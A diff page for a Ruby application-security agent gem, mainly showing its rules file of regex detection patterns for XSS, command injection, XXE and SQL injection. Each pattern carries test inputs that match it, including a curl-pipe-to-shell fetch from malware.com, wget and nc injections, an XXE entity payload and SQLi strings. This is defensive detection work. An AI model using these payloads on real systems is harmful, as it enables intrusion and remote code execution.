tcell_agent 0.2.29 → 0.4.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (100) hide show
  1. checksums.yaml +4 -4
  2. data/Readme.txt +7 -0
  3. data/bin/tcell_agent +9 -0
  4. data/lib/tcell_agent/agent/policy_manager.rb +3 -0
  5. data/lib/tcell_agent/agent/policy_types.rb +4 -1
  6. data/lib/tcell_agent/appsensor/injections_matcher.rb +20 -0
  7. data/lib/tcell_agent/appsensor/injections_reporter.rb +15 -56
  8. data/lib/tcell_agent/appsensor/meta_data.rb +56 -2
  9. data/lib/tcell_agent/appsensor/rules/baserules.json +371 -138
  10. data/lib/tcell_agent/cmdi.rb +113 -0
  11. data/lib/tcell_agent/config/unknown_options.rb +2 -0
  12. data/lib/tcell_agent/configuration.rb +30 -16
  13. data/lib/tcell_agent/hooks/login_fraud.rb +79 -0
  14. data/lib/tcell_agent/instrumentation.rb +6 -11
  15. data/lib/tcell_agent/patches/meta_data.rb +14 -11
  16. data/lib/tcell_agent/policies/appsensor/injection_sensor.rb +5 -9
  17. data/lib/tcell_agent/policies/appsensor_policy.rb +22 -206
  18. data/lib/tcell_agent/policies/clickjacking_policy.rb +4 -2
  19. data/lib/tcell_agent/policies/command_injection_policy.rb +196 -0
  20. data/lib/tcell_agent/policies/content_security_policy.rb +3 -2
  21. data/lib/tcell_agent/policies/dataloss_policy.rb +3 -1
  22. data/lib/tcell_agent/policies/honeytokens_policy.rb +3 -1
  23. data/lib/tcell_agent/policies/http_redirect_policy.rb +51 -37
  24. data/lib/tcell_agent/policies/http_tx_policy.rb +5 -1
  25. data/lib/tcell_agent/policies/login_fraud_policy.rb +6 -1
  26. data/lib/tcell_agent/policies/patches_policy.rb +3 -1
  27. data/lib/tcell_agent/policies/policy.rb +10 -0
  28. data/lib/tcell_agent/policies/secure_headers_policy.rb +5 -2
  29. data/lib/tcell_agent/rails/auth/devise.rb +12 -23
  30. data/lib/tcell_agent/rails/csrf_exception.rb +1 -1
  31. data/lib/tcell_agent/rails/dlp.rb +50 -54
  32. data/lib/tcell_agent/rails/middleware/body_filter_middleware.rb +0 -1
  33. data/lib/tcell_agent/rails/middleware/context_middleware.rb +0 -1
  34. data/lib/tcell_agent/rails/middleware/global_middleware.rb +0 -1
  35. data/lib/tcell_agent/rails/middleware/headers_middleware.rb +7 -10
  36. data/lib/tcell_agent/rails/on_start.rb +0 -1
  37. data/lib/tcell_agent/rails/tcell_body_proxy.rb +4 -4
  38. data/lib/tcell_agent/rails.rb +0 -2
  39. data/lib/tcell_agent/rust/libtcellagent-0.6.1.dylib +0 -0
  40. data/lib/tcell_agent/rust/libtcellagent-0.6.1.so +0 -0
  41. data/lib/tcell_agent/rust/models.rb +61 -0
  42. data/lib/tcell_agent/rust/tcellagent-0.6.1.dll +0 -0
  43. data/lib/tcell_agent/rust/whisperer.rb +112 -0
  44. data/lib/tcell_agent/sensor_events/appsensor_event.rb +25 -21
  45. data/lib/tcell_agent/sensor_events/appsensor_meta_event.rb +31 -24
  46. data/lib/tcell_agent/sensor_events/command_injection.rb +58 -0
  47. data/lib/tcell_agent/sensor_events/discovery.rb +1 -1
  48. data/lib/tcell_agent/sensor_events/login_fraud.rb +3 -13
  49. data/lib/tcell_agent/sensor_events/sensor.rb +81 -77
  50. data/lib/tcell_agent/sensor_events/util/sanitizer_utilities.rb +8 -0
  51. data/lib/tcell_agent/start_background_thread.rb +12 -3
  52. data/lib/tcell_agent/utils/io.rb +4 -1
  53. data/lib/tcell_agent/utils/params.rb +1 -0
  54. data/lib/tcell_agent/version.rb +1 -1
  55. data/lib/tcell_agent.rb +0 -1
  56. data/spec/lib/tcell_agent/appsensor/injections_matcher_spec.rb +27 -9
  57. data/spec/lib/tcell_agent/appsensor/injections_reporter_spec.rb +143 -193
  58. data/spec/lib/tcell_agent/appsensor/meta_data_spec.rb +67 -0
  59. data/spec/lib/tcell_agent/appsensor/rules/appsensor_rule_manager_spec.rb +0 -10
  60. data/spec/lib/tcell_agent/cmdi_spec.rb +748 -0
  61. data/spec/lib/tcell_agent/config/unknown_options_spec.rb +8 -0
  62. data/spec/lib/tcell_agent/configuration_spec.rb +138 -6
  63. data/spec/lib/tcell_agent/hooks/login_fraud_spec.rb +357 -0
  64. data/spec/lib/tcell_agent/patches/block_rule_spec.rb +70 -87
  65. data/spec/lib/tcell_agent/patches_spec.rb +9 -4
  66. data/spec/lib/tcell_agent/policies/appsensor/xss_sensor_spec.rb +186 -9
  67. data/spec/lib/tcell_agent/policies/appsensor_policy_spec.rb +309 -484
  68. data/spec/lib/tcell_agent/policies/command_injection_policy_spec.rb +736 -0
  69. data/spec/lib/tcell_agent/policies/http_redirect_policy_spec.rb +222 -41
  70. data/spec/lib/tcell_agent/policies/patches_policy_spec.rb +56 -32
  71. data/spec/lib/tcell_agent/rails/middleware/appsensor_middleware_spec.rb +161 -85
  72. data/spec/lib/tcell_agent/rails/middleware/tcell_body_proxy_spec.rb +40 -72
  73. data/spec/lib/tcell_agent/rust/whisperer_spec.rb +267 -0
  74. data/spec/lib/tcell_agent/sensor_events/appsensor_meta_event_spec.rb +20 -15
  75. data/spec/spec_helper.rb +0 -9
  76. data/tcell_agent.gemspec +8 -3
  77. metadata +40 -39
  78. data/lib/tcell_agent/appsensor/sensor.rb +0 -52
  79. data/lib/tcell_agent/policies/appsensor/database_sensor.rb +0 -56
  80. data/lib/tcell_agent/policies/appsensor/misc_sensor.rb +0 -59
  81. data/lib/tcell_agent/policies/appsensor/payloads_policy.rb +0 -150
  82. data/lib/tcell_agent/policies/appsensor/request_size_sensor.rb +0 -25
  83. data/lib/tcell_agent/policies/appsensor/response_codes_sensor.rb +0 -73
  84. data/lib/tcell_agent/policies/appsensor/response_size_sensor.rb +0 -25
  85. data/lib/tcell_agent/policies/appsensor/size_sensor.rb +0 -71
  86. data/lib/tcell_agent/policies/appsensor/user_agent_sensor.rb +0 -47
  87. data/lib/tcell_agent/rails/auth/hooks.rb +0 -79
  88. data/lib/tcell_agent/sensor_events/util/redirect_utils.rb +0 -22
  89. data/spec/lib/tcell_agent/policies/appsensor/database_sensor_spec.rb +0 -165
  90. data/spec/lib/tcell_agent/policies/appsensor/misc_sensor_spec.rb +0 -429
  91. data/spec/lib/tcell_agent/policies/appsensor/payloads_policy_apply_spec.rb +0 -466
  92. data/spec/lib/tcell_agent/policies/appsensor/payloads_policy_from_json_spec.rb +0 -890
  93. data/spec/lib/tcell_agent/policies/appsensor/payloads_policy_log_spec.rb +0 -417
  94. data/spec/lib/tcell_agent/policies/appsensor/request_size_sensor_spec.rb +0 -236
  95. data/spec/lib/tcell_agent/policies/appsensor/response_codes_sensor_spec.rb +0 -297
  96. data/spec/lib/tcell_agent/policies/appsensor/response_size_sensor_spec.rb +0 -241
  97. data/spec/lib/tcell_agent/policies/appsensor/user_agent_sensor_spec.rb +0 -172
  98. data/spec/lib/tcell_agent/rails/auth/hooks_spec.rb +0 -246
  99. data/spec/lib/tcell_agent/sensor_events/util/redirect_utils_spec.rb +0 -25
  100. data/spec/support/resources/baserules.json +0 -155
@@ -1,231 +1,464 @@
1
1
  {
2
- "version":"20160516",
3
- "sensors":{
4
- "xss":{
5
- "patterns":[
2
+ "version": "20171205",
3
+ "sensors": {
4
+ "xss": {
5
+ "patterns": [
6
6
  {
7
- "title":"Basic Injection",
8
- "sophistication":1,
7
+ "title": "Basic Injection",
8
+ "sophistication": 1,
9
9
  "common": "(?:<(script|iframe|embed|frame|frameset|object|img|applet|body|html|style|layer|link|ilayer|meta|bgsound))",
10
10
  "tests": {
11
- "shouldFind":["\n\n<scRipT>document.write(1)</script>","<body onload=\"abc\">","<script>alert(123)</script>","<script>alert(\"hellox world\");</script>","9<script/src=http/attacker.com>"],
12
- "shouldIgnore":["<h1>hi</h1>","Bob","Script"]
11
+ "shouldFind": [
12
+ "\n\n<scRipT>document.write(1)</script>",
13
+ "<body onload=\"abc\">",
14
+ "<script>alert(123)</script>",
15
+ "<script>alert(\"hellox world\");</script>",
16
+ "9<script/src=http/attacker.com>"
17
+ ],
18
+ "shouldIgnore": [
19
+ "<h1>hi</h1>",
20
+ "Bob",
21
+ "Script"
22
+ ]
13
23
  },
14
24
  "id": "1"
15
25
  },
16
26
  {
17
- "title":"Alert or Event XSS",
18
- "sophistication":2,
19
- "common": "(?:(alert|on\\w+|function\\s+\\w+)\\s*\\(\\s*(['+\\d\\w](,?\\s*['+\\d\\w]*)*)*\\s*\\))",
20
- "tests":{
21
- "shouldFind":["<input onmouseover='alert(1)'>","<input/onmouseover='alert(1)'>"],
22
- "shouldIgnore":["<h1>hi</h1>","Bob","Sammy"]
27
+ "title": "Alert or Event XSS",
28
+ "sophistication": 2,
29
+ "common": "(?:(alert|on\\w+\\s*=|function\\s+\\w+)\\s*\\(\\s*(['+\\d\\w](,?\\s*['+\\d\\w]*)*)*\\s*\\))",
30
+ "tests": {
31
+ "shouldFind": [
32
+ "<input onmouseover='alert(1)'>",
33
+ "<input/onmouseover='alert(1)'>"
34
+ ],
35
+ "shouldIgnore": [
36
+ "Email de la personne (action du front)",
37
+ "<h1>hi</h1>",
38
+ "()",
39
+ "Bob",
40
+ "Sammy"
41
+ ]
23
42
  },
24
43
  "id": "2"
25
44
  },
26
45
  {
27
- "title":"Attribute Breaks",
28
- "sophistication":3,
29
- "common": "(?:\\\"+.*[<=]\\s*\\\"[^\\\"]+\\\")|(?:\\\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\\\"\\s]*>)|(?:\\\"\\s*(?:src|style|on\\w+)\\s*=\\s*\\\")|(?:[^\\\"]?\\\"[,;\\s]+\\w*[\\[\\(])(?:^>[\\w\\s]*<\\/?\\w{2,}>)",
30
- "tests":{
31
- "shouldFind":["<input src=\"b\" onmouseover=\"alert(1)\" test=\"abc\">"],
32
- "shouldIgnore":["<h1>hi</h1>","<i class=\"test\">test</i>","Bob","Sammy","<i>","onmouseover","\"alert(1)\""]
33
- },
34
- "id": "4"
46
+ "title": "Attribute Breaks",
47
+ "sophistication": 3,
48
+ "common": "(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])(?:^>[\\w\\s]*</?\\w{2,}>)",
49
+ "tests": {
50
+ "shouldFind": [
51
+ "<input src=\"b\" onmouseover=\"alert(1)\" test=\"abc\">"
52
+ ],
53
+ "shouldIgnore": [
54
+ "<h1>hi</h1>",
55
+ "<i class=\"test\">test</i>",
56
+ "Bob",
57
+ "Sammy",
58
+ "<i>",
59
+ "onmouseover",
60
+ "\"alert(1)\""
61
+ ]
62
+ },
63
+ "id": "4"
35
64
  },
36
65
  {
37
- "title":"Basic Obfuscation",
38
- "sophistication":3,
39
- "common": "(?:[\\\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\\\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\\\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])",
40
- "tests": {
41
- "shouldFind":[",YAHOO.util.Get.script(\"http://ha.ckers.org/xss.js\")"],
42
- "shouldIgnore":["<h1>hi</h1>","<i class=\"test\">test</i>","Bob","Sammy","<i>","onmouseover","\"alert(1)\""]
43
- },
44
- "id": "5"
66
+ "title": "Basic Obfuscation",
67
+ "sophistication": 3,
68
+ "common": "(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:/[\\w\\s]+/\\.)|(?:=\\s*/\\w+/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])",
69
+ "tests": {
70
+ "shouldFind": [
71
+ ",YAHOO.util.Get.script(\"http://ha.ckers.org/xss.js\")"
72
+ ],
73
+ "shouldIgnore": [
74
+ "<h1>hi</h1>",
75
+ "<i class=\"test\">test</i>",
76
+ "Bob",
77
+ "Sammy",
78
+ "<i>",
79
+ "onmouseover",
80
+ "\"alert(1)\""
81
+ ]
82
+ },
83
+ "id": "5"
45
84
  },
46
85
  {
47
- "title":"Common Concatenation",
48
- "sophistication":3,
49
- "common": "(?:=\\s*\\w+\\s*\\+\\s*\\\")|(?:\\+=\\s*\\(\\s\\\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\\\"\\s*\\+\\s*\\\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\\\"\\s*[&|]+\\s*\\\")|(?:\\/\\s*\\?\\s*\\\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:\\]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)",
50
- "tests": {
51
- "shouldFind":["= werewr + \""],
52
- "shouldIgnore":["<h1>hi</h1>","<i class=\"test\">test</i>","Bob","Sammy","<i>","onmouseover","\"alert(1)\""]
53
- },
54
- "id": "6"
86
+ "title": "Common Concatenation",
87
+ "sophistication": 3,
88
+ "common": "(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[\\s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:/\\s*\\?\\s*\")|(?:/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:\\]\\s*\\[\\W*\\w)",
89
+ "tests": {
90
+ "shouldFind": [
91
+ "=a+\"",
92
+ "+=( \"",
93
+ "! 1,000.0a?",
94
+ "= [ ]",
95
+ "\" + \"",
96
+ "#[ 1 ] ;",
97
+ "^[ 1 ] +",
98
+ "\" & \"",
99
+ "\" || \"",
100
+ "/ ? \"",
101
+ "/ ) [",
102
+ "1?a:1",
103
+ "] [$a",
104
+ "= werewr + \""
105
+ ],
106
+ "shouldIgnore": [
107
+ "<h1>hi</h1>",
108
+ "<i class=\"test\">test</i>",
109
+ "Bob",
110
+ "Sammy",
111
+ "<i>",
112
+ "onmouseover",
113
+ "http://127.0.0.1:4000/contrib?file=/etc/passwd",
114
+ "e=/",
115
+ "\"alert(1)\""
116
+ ]
117
+ },
118
+ "id": "6"
55
119
  },
56
120
  {
57
- "title":"IFrame Tag Injection",
58
- "sophistication":1,
121
+ "title": "IFrame Tag Injection",
122
+ "sophistication": 1,
59
123
  "common": "<iframe.*",
60
124
  "tests": {
61
- "shouldFind":["Sam\n<h3><iframe/src=\\\\malware.xcc/>"],
62
- "shouldIgnore":["<h1>hi</h1>","Bob","Script"]
125
+ "shouldFind": [
126
+ "Sam\n<h3><iframe/src=\\\\malware.xcc/>"
127
+ ],
128
+ "shouldIgnore": [
129
+ "<h1>hi</h1>",
130
+ "Bob",
131
+ "Script"
132
+ ]
63
133
  },
64
134
  "id": "7"
65
135
  },
66
136
  {
67
- "title":"JavaScript URL",
68
- "sophistication":1,
137
+ "title": "JavaScript URL",
138
+ "sophistication": 1,
69
139
  "common": "\\b(src|href|lowsrc|url|content)\\b\\W*?\\bjavascript:",
70
140
  "tests": {
71
- "shouldFind":["\" href=\"javascript:alert(1)\"","' url='javascript:alert(1)'","<input type=image src=javascript:","<meta http-equiv=\"refresh\" content=\"javascript:..."],
72
- "shouldIgnore":["<h1>hi</h1>","Bob","Script"]
141
+ "shouldFind": [
142
+ "\" href=\"javascript:alert(1)\"",
143
+ "' url='javascript:alert(1)'",
144
+ "<input type=image src=javascript:",
145
+ "<meta http-equiv=\"refresh\" content=\"javascript:..."
146
+ ],
147
+ "shouldIgnore": [
148
+ "<h1>hi</h1>",
149
+ "Bob",
150
+ "Script"
151
+ ]
73
152
  },
74
153
  "id": "8"
75
-
76
-
77
154
  }
78
155
  ]
79
156
  },
80
- "cmdi":{
81
- "safe_pattern":"^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
82
- "patterns":[
157
+ "cmdi": {
158
+ "safe_pattern": "^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
159
+ "patterns": [
160
+ {
161
+ "title": "Common Remote Attempts",
162
+ "sophistication": 2,
163
+ "id": "1",
164
+ "common": "(?:[;\\|`]\\W*?\\bcc|[&\\|;]\\W*\\b\\b(wget|curl))\\b|/cc(?:['\"\\|;`\\-\\s]|$)",
165
+ "tests": {
166
+ "shouldFind": [
167
+ "|wget https://malware.com",
168
+ "& curl https://malware.com/run_me.sh|sh"
169
+ ],
170
+ "shouldIgnore": [
171
+ "curl/7.54.0",
172
+ "Wget/1.17.1 (linux-gnu)",
173
+ "aB--D_C=",
174
+ "union soldier",
175
+ "a",
176
+ "select",
177
+ "James O'Connor",
178
+ "Like this or that",
179
+ "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2",
180
+ "divide and conquer"
181
+ ]
182
+ }
183
+ },
83
184
  {
84
- "title":"Common Remote Attempts",
85
- "sophistication":2,
86
- "id":"1",
87
- "common":"(?:[\\;\\|\\`]\\W*?\\bcc|\\b(wget|curl))\\b|\\/cc(?:[\\'\\\"\\|\\;\\`\\-\\s]|$)",
185
+ "title": "Common Command Attempts",
186
+ "sophistication": 1,
187
+ "id": "2",
188
+ "common": "(?:\\b(?:(?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?:(?:\\.exe|32)\\b|\\b\\W*?/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[;\\|`]\\W*?\\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|ruby|node|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\\b|g(?:\\+\\+|cc\b)))",
88
189
  "tests": {
89
- "shouldFind":["|wget https://malware.com"],
90
- "shouldIgnore":["aB--D_C=","union soldier", "a", "select", "James O'Connor", "Like this or that", "divide and conquer"]
190
+ "shouldFind": [
191
+ "test|echo hi",
192
+ "abc;nc",
193
+ "`ls /etc/passwd`",
194
+ "`python /my/code`",
195
+ "`ruby /my/code`",
196
+ "`node /my/code`"
197
+ ],
198
+ "shouldIgnore": [
199
+ "aB--D_C=",
200
+ "union soldier",
201
+ "a",
202
+ "select",
203
+ "James O'Connor",
204
+ "Like this or that",
205
+ "divide and conquer",
206
+ "david;bob",
207
+ "python",
208
+ "ruby",
209
+ "node"
210
+ ]
91
211
  }
92
212
  },
93
213
  {
94
- "title":"Common Command Attempts",
95
- "sophistication":1,
96
- "id":"2",
97
- "common":"(?:\\b(?:(?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?:(?:\\.exe|32)\\b|\\b\\W*?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*?\\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\\b|g(?:\\+\\+|cc\b)))",
214
+ "title": "XML Injection Attempts",
215
+ "sophistication": 1,
216
+ "id": "3",
217
+ "common": "<\\?xml.*<!ENTITY",
98
218
  "tests": {
99
- "shouldFind":["test|echo hi","abc;nc","`ls /etc/passwd`"],
100
- "shouldIgnore":["aB--D_C=","union soldier", "a", "select", "James O'Connor", "Like this or that", "divide and conquer","david;bob"]
219
+ "shouldFind": [
220
+ "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM \"file:///dev/random\" >]><foo>&xxe;</foo>"
221
+ ],
222
+ "shouldIgnore": [
223
+ "aB--D_C=",
224
+ "union soldier",
225
+ "a",
226
+ "select",
227
+ "James O'Connor",
228
+ "Like this or that",
229
+ "divide and conquer",
230
+ "david;bob",
231
+ "python",
232
+ "ruby",
233
+ "node"
234
+ ]
101
235
  }
102
236
  }
103
237
  ]
104
238
  },
105
- "sqli":{
106
- "safe_pattern":"^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
107
- "patterns":[
239
+ "sqli": {
240
+ "safe_pattern": "^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
241
+ "patterns": [
108
242
  {
109
- "title":"Common Encoding Obfuscations",
110
- "sophistication":3,
111
- "common": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))","common": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))",
112
- "java": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|\\{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))","common": "(?:(?:\\d[\\\"'`\u00b4\u2019\u2018]\\s+[\\\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\\\"'`\u00b4\u2019\u2018]|(\\/\\*)+[\\\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|\\/\\*|\\{)?)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\\\"'`\u00b4\u2019\u2018])|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\\\"'`\u00b4\u2019\u2018(].*?$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\\\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\\\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\\\"'`\u00b4\u2019\u2018][<>~]+[\\\"'`\u00b4\u2019\u2018]))",
243
+ "title": "Common Encoding Obfuscations",
244
+ "sophistication": 3,
245
+ "common": "(?:(?:\\d[\"'`\u00b4\u2019\u2018]\\s+[\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\"'`\u00b4\u2019\u2018]|(/\\*)+[\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|/\\*|\\{)?)|(?:[\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\"'`\u00b4\u2019\u2018(].*?$)|(?:[\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\"'`\u00b4\u2019\u2018][<>~]+[\"'`\u00b4\u2019\u2018]))",
113
246
  "tests": {
114
- "shouldFind":["') or ('1'='1--","') or ('1'='1--","1 OR '1'!=0","aa' LIKE md5(1) or '1"],
115
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
247
+ "shouldFind": [
248
+ "') or ('1'='1--",
249
+ "') or ('1'='1--",
250
+ "1 OR '1'!=0",
251
+ "aa' LIKE md5(1) or '1"
252
+ ],
253
+ "shouldIgnore": [
254
+ "aB--D_C=",
255
+ "union soldier",
256
+ "select",
257
+ "James O'Connor",
258
+ "Like this or that",
259
+ "divide and conquer"
260
+ ]
116
261
  },
117
262
  "id": "1"
118
263
  },
119
264
  {
120
- "title":"Common Probes/Executions",
121
- "sophistication":1,
122
- "common": "\\b(?:having)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=<>]|(?:\\bexecute(\\s{1,5}[\\w\\.$]{1,5}\\s{0,3})?\\()|\\bhaving\\b ?(?:\\d{1,10}|[\\'\\\"][^=]{1,10}[\\'\\\"]) ?[=<>]+|(?:\\bcreate\\s+?table.{0,20}?\\()|(?:\\blike\\W*?char\\W*?\\()|(?:(?:(select(.*?)case|from(.*?)limit|order\\sby)))|exists\\s(\\sselect|select\\Sif(null)?\\s\\(|select\\Stop|select\\Sconcat|system\\s\\(|\\b(?:having)\\b\\s+(\\d{1,10})|'[^=]{1,10}')",
265
+ "title": "Common Probes/Executions",
266
+ "sophistication": 1,
267
